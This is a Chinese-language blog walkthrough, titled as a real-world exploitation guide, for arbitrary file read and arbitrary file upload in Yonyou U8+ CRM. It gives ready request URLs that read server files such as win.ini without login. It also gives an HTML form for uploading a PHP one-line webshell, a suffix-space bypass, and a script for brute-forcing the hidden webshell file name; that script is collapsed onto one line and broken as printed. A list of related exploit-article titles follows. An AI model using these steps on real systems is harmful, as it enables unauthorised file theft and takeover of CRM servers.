用友U8+ CRM任意文件上传、任意文件读取 实战
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞
任意文件读取
存在漏洞的文件为:
/ajax/getemaildata.php
访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt
可以看到用友版本7.2 patch2
访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
可以看到C://windows/win.ini
任意文件上传
首先构造一个文件上传的页面
<html><form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data"> <input type="file" name="file" /> <input type="submit" name="upload" value="upload"/></form></html>
选择php一句话木马
打开burp进行抓包,在文件上传的后缀名处添加一个空格
返回的tmpfile\\mht3AC8.tmp.mht
即为木马地址,访问http://IP:端口/tmpfile//mht3AC8.tmp.mht
即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php
,将前面的mht改为upd,将后面的mht改为php
抓包,将其放到爆破工具里,爆破中间的3AC8
,范围是从0000~FFFF,共65536个
生成字典的脚本如下:
with open('1.txt', 'w') as f:for i in range(0x10000):f.write(format(i, '04X') + '\n')
该脚本会在当前目录下生成1.txt
成功访问到马
用友U8+ CRM任意文件上传、任意文件读取 实战相关推荐
- 通达OA未授权任意文件上传及文件包含漏洞分析学习
今年3月份通达OA爆出了文件上传和文件包含漏洞,网络上很多复现和分析的博客,今天我也来试着分析分析,据360灵腾安全实验室判断该漏洞等级为高,利用难度低,威胁程度高,所以可能比较适合代码审计的新手来练 ...
- 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell
点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...
- 代码审计:YCCMS 代码执行 文件上传 任意文件删除
代码审计:YCCMS 代码执行 文件上传 任意文件删除 YCCMS 审计准备 代码审计 代码执行漏洞 文件上传漏洞 任意文件删除漏洞 YCCMS YCCMS是一款PHP版轻量级CMS建站系统,程序页面 ...
- 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...
- SRC挖洞之文件上传/下载漏洞的实战案例
文章目录 前言 任意文件下载 案例1 某OA系统任意文件下载 案例2 某登录页面任意文件下载 案例3 某金融网站任意文件下载 案例4 服务端过滤 ../ 绕过下载 案例5 %00截断后下载任意文件 文 ...
- java文件上传_Java文件上传细讲
什么是文件上传? 文件上传就是把用户的信息保存起来. 为什么需要文件上传? 在用户注册的时候,可能需要用户提交照片.那么这张照片就应该要进行保存. 上传组件(工具) 为什么我们要使用上传工具? 为啥我 ...
- httpclient base64 文件上传_文件上传下载
说道文件上传下载,这个业务需求并不是很复杂思想如下 1.将文件上传到 某台服务器上的指定的路径下也可以这样理解 文件上传就是将本地图片发送到别的地方,下载就是将别的地方的图片放在本地 2.将路径同文件 ...
- 踩坑 - click事件与blur事件冲突问题 input文件上传同名文件问题
前言 上周写需求遇到了一点小坑涉及到一些小细节,今天赶上没啥事总结一下分享出来. click事件与blur事件冲突问题 click事件与blur事件 blur事件: 表单事件,元素失去焦点时候触发,不 ...
- 文件上传、文件包含和目路遍历杂谈
一.说明 文件上传.文件包含和目路遍历是<黑客防线>盛行的时代常谈的getshell手法,但到现在的安全书藉感觉就比较少提及或一笔带过.在谈的年代看不懂,在看得懂的年代又不谈了,概念感觉总 ...
- 文件上传时,文件太大会有几种被限制的情况
文件上传时,文件太大会有几种被限制的情况 近期在维护一个项目时,商户有反馈,在新增用户时会直接卡住并报错,返回一个异常,应用层没有日志,最后排查出来是nginx限制了请求的最大值. 那么整个链 ...
最新文章
- pandas计算dataframe两列数据值相等的行号、取出DataFrame中两列值相等的行号
- linux排序语言,Go语言排序sort的使用
- matlab怎让3d旋转,如何在MATLAB中平滑旋转3D绘图?
- 利用JS代码屏蔽指定地区访客浏览网站
- Hibernate 常见异常
- 存储过程可重用的代码块_利用软件重用经验进行自动化测试推荐
- python调用c++动态库_Python应用:调用C/C++动态链接库的方法详解
- openwrt nas_NAS里整个软路由
- spring源码之bean加载(bean解析下篇)
- mysql数据库白羽_Android应用开发Android 友盟推送原理解析
- python用smtplib、emai模块群发邮件
- 新浪微博开发平台地址 http://open.weibo.com/
- DAH首度披露“超级账本”区块链平台…
- python计算天数包含几周_如何在python中计算几周内两个日期之间的差异
- 管理菜单 结贴回复 来自 202.112.36.253 的回复: TTL 传输中过期
- 人工神经网络:径向基函数神经网络
- 版号解禁,网络游戏却未解冻
- 前端面试题之【CSS】
- windows10下Docker部署Kurento
- 深度学习中,范数有什么意义
热门文章
- jquery mobile android浏览器,我们怎样使用jQuery Mobile实现手机新闻浏览器
- 3.进制——进制转换和计算机存储单位
- 更改Windows Powser Shell 默认字体Consolas (一)
- 苹果禁用UDID再续:OpenUDID有望成为替代方案
- [转贴] 游戏服务器架构
- html5游戏狗,保卫萝卜2地下庄园D5攻略 极限清理太阳
- Hardcoded string should use @string resource
- python保存数据到文件的几种方法
- 苹果应用商店上架流程
- EBS 个性化示例1:修改标准FORM的LOV